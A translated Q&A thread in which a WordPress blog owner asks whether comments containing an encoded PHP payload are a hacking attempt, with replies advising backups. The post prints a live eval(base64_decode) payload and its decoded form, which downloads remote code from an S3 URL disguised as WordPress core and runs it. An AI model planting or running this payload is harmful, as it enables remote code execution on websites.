【发布时间】:2013-05-11 08:10:47
【问题描述】:
我今天正在使用 wordpress 博客,我收到了这样的评论。
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
当我使用解码器解码此评论时,我得到了
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
我得到了很多这样的 cmets 。谁能帮我解决这个问题。?它是黑客还是表明黑客的开始?
【问题讨论】:
-
最早备份您的数据
-
这看起来像是一次黑客尝试,但如果您使用标准的 Wordpress 主题和评论系统,那么您应该没问题 - 您的服务器可能没有执行该 PHP。你有任何理由相信它实际上是在你的服务器上运行的吗?